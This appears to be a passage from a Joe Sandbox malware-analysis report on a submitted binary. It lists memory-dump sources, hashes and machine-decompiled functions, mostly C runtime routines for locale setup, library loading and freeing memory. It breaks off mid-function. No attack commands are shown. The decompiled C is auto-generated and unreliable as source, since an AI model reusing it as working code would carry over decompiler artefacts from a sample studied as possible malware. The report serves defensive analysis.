                                                                                                                                                                          0x00a0c7e1
                                                                                                                                                                          0x00a0c7e3
                                                                                                                                                                          0x00a0c7e3
                                                                                                                                                                          0x00a0c7e3
                                                                                                                                                                          0x00a0c7e6
                                                                                                                                                                          0x00a0c7e6
                                                                                                                                                                          0x00a0c7e8
                                                                                                                                                                          0x00a0c7e9
                                                                                                                                                                          0x00a0c7e9
                                                                                                                                                                          0x00a0c7f1
                                                                                                                                                                          0x00a0c7f5
                                                                                                                                                                          0x00a0c7ff
                                                                                                                                                                          0x00a0c802
                                                                                                                                                                          0x00a0c807
                                                                                                                                                                          0x00a0c80a
                                                                                                                                                                          0x00a0c80e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c810
                                                                                                                                                                          0x00a0c818
                                                                                                                                                                          0x00a0c81d
                                                                                                                                                                          0x00a0c820
                                                                                                                                                                          0x00a0c822
                                                                                                                                                                          0x00a0c843
                                                                                                                                                                          0x00a0c845
                                                                                                                                                                          0x00a0c846
                                                                                                                                                                          0x00a0c847
                                                                                                                                                                          0x00a0c848
                                                                                                                                                                          0x00a0c849
                                                                                                                                                                          0x00a0c84a
                                                                                                                                                                          0x00a0c84f
                                                                                                                                                                          0x00a0c850
                                                                                                                                                                          0x00a0c855
                                                                                                                                                                          0x00a0c85b
                                                                                                                                                                          0x00a0c85d
                                                                                                                                                                          0x00a0c85e
                                                                                                                                                                          0x00a0c864
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c864
                                                                                                                                                                          0x00a0c869
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c822
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c824
                                                                                                                                                                          0x00a0c824
                                                                                                                                                                          0x00a0c827
                                                                                                                                                                          0x00a0c829
                                                                                                                                                                          0x00a0c829
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c82d
                                                                                                                                                                          0x00a0c7dc
                                                                                                                                                                          0x00a0c7ae
                                                                                                                                                                          0x00a0c7ae
                                                                                                                                                                          0x00a0c7ae
                                                                                                                                                                          0x00a0c7b0
                                                                                                                                                                          0x00a0c7b2
                                                                                                                                                                          0x00a0c7b2
                                                                                                                                                                          0x00a0c73d
                                                                                                                                                                          0x00a0c74e
                                                                                                                                                                          0x00a0c752
                                                                                                                                                                          0x00a0c75e
                                                                                                                                                                          0x00a0c760
                                                                                                                                                                          0x00a0c762
                                                                                                                                                                          0x00a0c767
                                                                                                                                                                          0x00a0c767
                                                                                                                                                                          0x00a0c76a
                                                                                                                                                                          0x00a0c76a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c760
                                                                                                                                                                          0x00a0c73b
                                                                                                                                                                          0x00a0c728
                                                                                                                                                                          0x00a0c706
                                                                                                                                                                          0x00a0c660
                                                                                                                                                                          0x00a0c65c
                                                                                                                                                                          0x00a0c5bb
                                                                                                                                                                          0x00a0c5bb
                                                                                                                                                                          0x00a0c5be
                                                                                                                                                                          0x00a0c5dc
                                                                                                                                                                          0x00a0c5dc
                                                                                                                                                                          0x00a0c5df
                                                                                                                                                                          0x00a0c5f2
                                                                                                                                                                          0x00a0c5f7
                                                                                                                                                                          0x00a0c5fc
                                                                                                                                                                          0x00a0c5ff
                                                                                                                                                                          0x00a0c605
                                                                                                                                                                          0x00a0c784
                                                                                                                                                                          0x00a0c784
                                                                                                                                                                          0x00a0c784
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c60b
                                                                                                                                                                          0x00a0c60b
                                                                                                                                                                          0x00a0c611
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c613
                                                                                                                                                                          0x00a0c61d
                                                                                                                                                                          0x00a0c622
                                                                                                                                                                          0x00a0c627
                                                                                                                                                                          0x00a0c62a
                                                                                                                                                                          0x00a0c630
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c630
                                                                                                                                                                          0x00a0c611
                                                                                                                                                                          0x00a0c5e1
                                                                                                                                                                          0x00a0c5e1
                                                                                                                                                                          0x00a0c787
                                                                                                                                                                          0x00a0c788
                                                                                                                                                                          0x00a0c78f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c791
                                                                                                                                                                          0x00a0c5c0
                                                                                                                                                                          0x00a0c5c0
                                                                                                                                                                          0x00a0c5c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c5c8
                                                                                                                                                                          0x00a0c5cd
                                                                                                                                                                          0x00a0c5cf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c5d5
                                                                                                                                                                          0x00a0c5d5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c5d5
                                                                                                                                                                          0x00a0c5cf
                                                                                                                                                                          0x00a0c5c6
                                                                                                                                                                          0x00a0c5be
                                                                                                                                                                          0x00a0c5b9
                                                                                                                                                                          0x00a0c5a0
                                                                                                                                                                          0x00a0c572
                                                                                                                                                                          0x00a0c572
                                                                                                                                                                          0x00a0c577
                                                                                                                                                                          0x00a0c57d
                                                                                                                                                                          0x00a0c792
                                                                                                                                                                          0x00a0c794
                                                                                                                                                                          0x00a0c794
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3409252457-0
                                                                                                                                                                          • Opcode ID: 09bd79e8820d23603d22c901aceb400c3956b5397afb76d5527bbc5356127da3
                                                                                                                                                                          • Instruction ID: 5a0c3dd51c8cd90eca243c8a4062bcfac7982deab0e39910aa7b3879445593ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 09bd79e8820d23603d22c901aceb400c3956b5397afb76d5527bbc5356127da3
                                                                                                                                                                          • Instruction Fuzzy Hash: DC5115B494420DAFDF20AFB4F981A6D7BA4AF06730F10836DE611971C1DB369A05CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F86A3 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 009F86EC
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 009F8718
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 009F8757
                                                                                                                                                                          • LCMapStringEx.KERNEL32 ref: 009F8774
                                                                                                                                                                          • LCMapStringEx.KERNEL32 ref: 009F87B3
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 009F87D0
                                                                                                                                                                          • LCMapStringEx.KERNEL32 ref: 009F8812
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009F8835
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2040435927-0
                                                                                                                                                                          • Opcode ID: ce9db903084c4385242f89346f8d96b5bc050a47685e977b14c86c7d03c70f6a
                                                                                                                                                                          • Instruction ID: fdffa7eaf631c813f40db24439e726c829465a2c19c5df1766540bb0d345a026
                                                                                                                                                                          • Opcode Fuzzy Hash: ce9db903084c4385242f89346f8d96b5bc050a47685e977b14c86c7d03c70f6a
                                                                                                                                                                          • Instruction Fuzzy Hash: C3519E7250020EAFEB609FA5DC45FBB7BB9EF44790F254429BA24EA150DB34DD11CBA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F1480 Relevance: 10.6, APIs: 7, Instructions: 107COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                          			E009F1480(intOrPtr _a4) {
				char _v52;
				char _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				void* _t43;
				signed int _t48;
				signed int _t49;
				signed char _t50;
				signed int _t53;
				signed int _t57;
				signed int _t63;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr _t67;
				void* _t68;
				void* _t69;
				void* _t72;

				_t68 =  &_v76;
				_t50 = 0;
				_v72 = 0;
				E009F6A1B( &_v72, 0);
				_t63 =  *0xa45b98; // 0x1
				_t67 =  *0xa45aa8; // 0xb83b30
				if(_t63 == 0) {
					E009F6A1B( &_v76, _t63);
					_t72 =  *0xa45b98 - _t50; // 0x1
					if(_t72 == 0) {
						_t48 =  *0xa45b80; // 0x3
						_t49 = _t48 + 1;
						 *0xa45b80 = _t49;
						 *0xa45b98 = _t49;
					}
					E009F6A73( &_v76);
					_t63 =  *0xa45b98; // 0x1
				}
				_t53 =  *(_a4 + 4);
				if(_t63 >=  *((intOrPtr*)(_t53 + 0xc))) {
					_t64 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 8)) + _t63 * 4));
					if(_t64 != 0) {
						L24:
						E009F6A73( &_v72);
						return _t64;
					} else {
						L8:
						if( *((intOrPtr*)(_t53 + 0x14)) == _t50) {
							L11:
							if(_t64 != 0) {
								goto L24;
							} else {
								goto L12;
							}
						} else {
							_t43 = E009F6D92();
							if(_t63 >=  *((intOrPtr*)(_t43 + 0xc))) {
								L12:
								if(_t67 == 0) {
									_push(0x18);
									_t65 = E009F89CD(__eflags);
									_t69 = _t68 + 4;
									__eflags = _t65;
									if(_t65 == 0) {
										_t64 = 0;
										__eflags = 0;
									} else {
										_t57 =  *(_a4 + 4);
										__eflags = _t57;
										if(_t57 == 0) {
											_t37 = 0xa1424c;
										} else {
											_t37 =  *(_t57 + 0x18);
											__eflags = _t37;
											if(_t37 == 0) {
												_t20 = _t57 + 0x1c; // 0x1c
												_t37 = _t20;
											}
										}
										_push(_t37);
										E009F19A0(_t50,  &_v52);
										 *(_t65 + 4) = _t50;
										 *_t65 = 0xa142dc;
										E009F6FAD(_t63, _t65, __eflags,  &_v72);
										_t69 = _t69 + 4;
										_t50 = 1;
										asm("movups xmm0, [eax]");
										asm("movups [esi+0x8], xmm0");
									}
									__eflags = _t50 & 0x00000001;
									if(__eflags != 0) {
										E009F2E10( &_v52, _t64);
									}
									E009F6D66(__eflags, _t64);
									 *((intOrPtr*)( *_t64 + 4))();
									 *0xa45aa8 = _t64;
									goto L24;
								} else {
									E009F6A73( &_v72);
									return _t67;
								}
							} else {
								_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 8)) + _t63 * 4));
								goto L11;
							}
						}
					}
				}
			}
























                                                                                                                                                                          0x009f1480
                                                                                                                                                                          0x009f1487
                                                                                                                                                                          0x009f148e
                                                                                                                                                                          0x009f1492
                                                                                                                                                                          0x009f1497
                                                                                                                                                                          0x009f149d
                                                                                                                                                                          0x009f14a5
                                                                                                                                                                          0x009f14ac
                                                                                                                                                                          0x009f14b1
                                                                                                                                                                          0x009f14b7
                                                                                                                                                                          0x009f14b9
                                                                                                                                                                          0x009f14be
                                                                                                                                                                          0x009f14bf
                                                                                                                                                                          0x009f14c4
                                                                                                                                                                          0x009f14c4
                                                                                                                                                                          0x009f14cd
                                                                                                                                                                          0x009f14d2
                                                                                                                                                                          0x009f14d2
                                                                                                                                                                          0x009f14dc
                                                                                                                                                                          0x009f14e2
                                                                                                                                                                          0x009f14f4
                                                                                                                                                                          0x009f14f4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f14e4
                                                                                                                                                                          0x009f14e7
                                                                                                                                                                          0x009f14ec
                                                                                                                                                                          0x009f15ac
                                                                                                                                                                          0x009f15b0
                                                                                                                                                                          0x009f15be
                                                                                                                                                                          0x009f14f2
                                                                                                                                                                          0x009f14f6
                                                                                                                                                                          0x009f14f9
                                                                                                                                                                          0x009f150b
                                                                                                                                                                          0x009f150d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f14fb
                                                                                                                                                                          0x009f14fb
                                                                                                                                                                          0x009f1503
                                                                                                                                                                          0x009f1513
                                                                                                                                                                          0x009f1515
                                                                                                                                                                          0x009f152c
                                                                                                                                                                          0x009f1533
                                                                                                                                                                          0x009f1535
                                                                                                                                                                          0x009f1538
                                                                                                                                                                          0x009f153a
                                                                                                                                                                          0x009f1586
                                                                                                                                                                          0x009f1586
                                                                                                                                                                          0x009f153c
                                                                                                                                                                          0x009f1540
                                                                                                                                                                          0x009f1543
                                                                                                                                                                          0x009f1545
                                                                                                                                                                          0x009f1553
                                                                                                                                                                          0x009f1547
                                                                                                                                                                          0x009f1547
                                                                                                                                                                          0x009f154a
                                                                                                                                                                          0x009f154c
                                                                                                                                                                          0x009f154e
                                                                                                                                                                          0x009f154e
                                                                                                                                                                          0x009f154e
                                                                                                                                                                          0x009f154c
                                                                                                                                                                          0x009f1558
                                                                                                                                                                          0x009f155d
                                                                                                                                                                          0x009f1566
                                                                                                                                                                          0x009f156a
                                                                                                                                                                          0x009f1570
                                                                                                                                                                          0x009f1575
                                                                                                                                                                          0x009f1578
                                                                                                                                                                          0x009f157d
                                                                                                                                                                          0x009f1580
                                                                                                                                                                          0x009f1580
                                                                                                                                                                          0x009f1588
                                                                                                                                                                          0x009f158b
                                                                                                                                                                          0x009f1591
                                                                                                                                                                          0x009f1591
                                                                                                                                                                          0x009f1597
                                                                                                                                                                          0x009f15a3
                                                                                                                                                                          0x009f15a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1517
                                                                                                                                                                          0x009f151d
                                                                                                                                                                          0x009f152b
                                                                                                                                                                          0x009f152b
                                                                                                                                                                          0x009f1505
                                                                                                                                                                          0x009f1508
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1508
                                                                                                                                                                          0x009f1503
                                                                                                                                                                          0x009f14f9
                                                                                                                                                                          0x009f14ec

                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F1492
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F14AC
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F14CD
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F151D
                                                                                                                                                                          • __Getctype.LIBCPMT ref: 009F1570
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 009F1597
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F15B0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2525760861-0
                                                                                                                                                                          • Opcode ID: fc919fa3f3a5587d67bce8e69c171011d1ea2563348ec0bf9992ef16f36973d6
                                                                                                                                                                          • Instruction ID: 8bf45bf88383bdd260310e8cce90505b87a327e27c06642fb3837f82c73d0c8c
                                                                                                                                                                          • Opcode Fuzzy Hash: fc919fa3f3a5587d67bce8e69c171011d1ea2563348ec0bf9992ef16f36973d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 4431F379A00718CFC710DF58D880A7AB3A4EFD1360B19442DFA4657222EB32ED46CBD2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A061E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A061E0(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xa46730 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xa185a0 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00A03E58(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00A03E58(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                                                                                                                                                          0x00a061e9
                                                                                                                                                                          0x00a06293
                                                                                                                                                                          0x00a061f1
                                                                                                                                                                          0x00a061f3
                                                                                                                                                                          0x00a061fa
                                                                                                                                                                          0x00a061fc
                                                                                                                                                                          0x00a06202
                                                                                                                                                                          0x00a0620f
                                                                                                                                                                          0x00a06224
                                                                                                                                                                          0x00a06228
                                                                                                                                                                          0x00a0627a
                                                                                                                                                                          0x00a0627a
                                                                                                                                                                          0x00a0627f
                                                                                                                                                                          0x00a06283
                                                                                                                                                                          0x00a06286
                                                                                                                                                                          0x00a06286
                                                                                                                                                                          0x00a0628c
                                                                                                                                                                          0x00a0628e
                                                                                                                                                                          0x00a062a3
                                                                                                                                                                          0x00a0629e
                                                                                                                                                                          0x00a062a2
                                                                                                                                                                          0x00a062a2
                                                                                                                                                                          0x00a06290
                                                                                                                                                                          0x00a06290
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a06290
                                                                                                                                                                          0x00a0622a
                                                                                                                                                                          0x00a06233
                                                                                                                                                                          0x00a0626a
                                                                                                                                                                          0x00a0626a
                                                                                                                                                                          0x00a0626c
                                                                                                                                                                          0x00a0626e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a06276
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a06276
                                                                                                                                                                          0x00a0623d
                                                                                                                                                                          0x00a06242
                                                                                                                                                                          0x00a06247
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a06251
                                                                                                                                                                          0x00a06256
                                                                                                                                                                          0x00a0625b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a06260
                                                                                                                                                                          0x00a06266
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a06266
                                                                                                                                                                          0x00a06207
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0620d
                                                                                                                                                                          0x00a0629c
                                                                                                                                                                          0x00000000

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                          • API String ID: 0-537541572
                                                                                                                                                                          • Opcode ID: ac3876418d237c58d04e83354fd97c2ef59c8e00f85be48ed7bcf3e41cd3a07f
                                                                                                                                                                          • Instruction ID: 92d027690996ef53ad8963cbcffc7eecb305a90a53adb07f560771d7491db432
                                                                                                                                                                          • Opcode Fuzzy Hash: ac3876418d237c58d04e83354fd97c2ef59c8e00f85be48ed7bcf3e41cd3a07f
                                                                                                                                                                          • Instruction Fuzzy Hash: B521D832E05218EBDB2187A4FC40ADA3768AF5D768F150510FD16A72D0D630ED1186E0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0D57F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0D57F(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00A0D2CB(_t45, 7);
					E00A0D2CB(_t45 + 0x1c, 7);
					E00A0D2CB(_t45 + 0x38, 0xc);
					E00A0D2CB(_t45 + 0x68, 0xc);
					E00A0D2CB(_t45 + 0x98, 2);
					E00A0447F( *((intOrPtr*)(_t45 + 0xa0)));
					E00A0447F( *((intOrPtr*)(_t45 + 0xa4)));
					E00A0447F( *((intOrPtr*)(_t45 + 0xa8)));
					E00A0D2CB(_t45 + 0xb4, 7);
					E00A0D2CB(_t45 + 0xd0, 7);
					E00A0D2CB(_t45 + 0xec, 0xc);
					E00A0D2CB(_t45 + 0x11c, 0xc);
					E00A0D2CB(_t45 + 0x14c, 2);
					E00A0447F( *((intOrPtr*)(_t45 + 0x154)));
					E00A0447F( *((intOrPtr*)(_t45 + 0x158)));
					E00A0447F( *((intOrPtr*)(_t45 + 0x15c)));
					return E00A0447F( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                                                                                                                                          0x00a0d585
                                                                                                                                                                          0x00a0d58a
                                                                                                                                                                          0x00a0d593
                                                                                                                                                                          0x00a0d59e
                                                                                                                                                                          0x00a0d5a9
                                                                                                                                                                          0x00a0d5b4
                                                                                                                                                                          0x00a0d5c2
                                                                                                                                                                          0x00a0d5cd
                                                                                                                                                                          0x00a0d5d8
                                                                                                                                                                          0x00a0d5e3
                                                                                                                                                                          0x00a0d5f1
                                                                                                                                                                          0x00a0d5ff
                                                                                                                                                                          0x00a0d610
                                                                                                                                                                          0x00a0d61e
                                                                                                                                                                          0x00a0d62c
                                                                                                                                                                          0x00a0d637
                                                                                                                                                                          0x00a0d642
                                                                                                                                                                          0x00a0d64d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0d65d
                                                                                                                                                                          0x00a0d662

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A0D2CB: _free.LIBCMT ref: 00A0D2F0
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D5CD
                                                                                                                                                                            • Part of subcall function 00A0447F: HeapFree.KERNEL32(00000000,00000000,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?), ref: 00A04495
                                                                                                                                                                            • Part of subcall function 00A0447F: GetLastError.KERNEL32(?,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?,?), ref: 00A044A7
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D5D8
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D5E3
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D637
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D642
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D64D
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D658
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: f699fb094b894f69717699cd97e6a8b37ec34cd92e3b3e542146b3030a5b99f8
                                                                                                                                                                          • Instruction ID: 1469407634b52d87ca1df5d175a998ac605a5fd36e6f3b3c2241ff9dff82e6d2
                                                                                                                                                                          • Opcode Fuzzy Hash: f699fb094b894f69717699cd97e6a8b37ec34cd92e3b3e542146b3030a5b99f8
                                                                                                                                                                          • Instruction Fuzzy Hash: D3111F72540B0CAAD620BBB0EE47FCB779C7F4D700F805915B39D660D2DB65F9058650
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0789E Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                          			E00A0789E(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
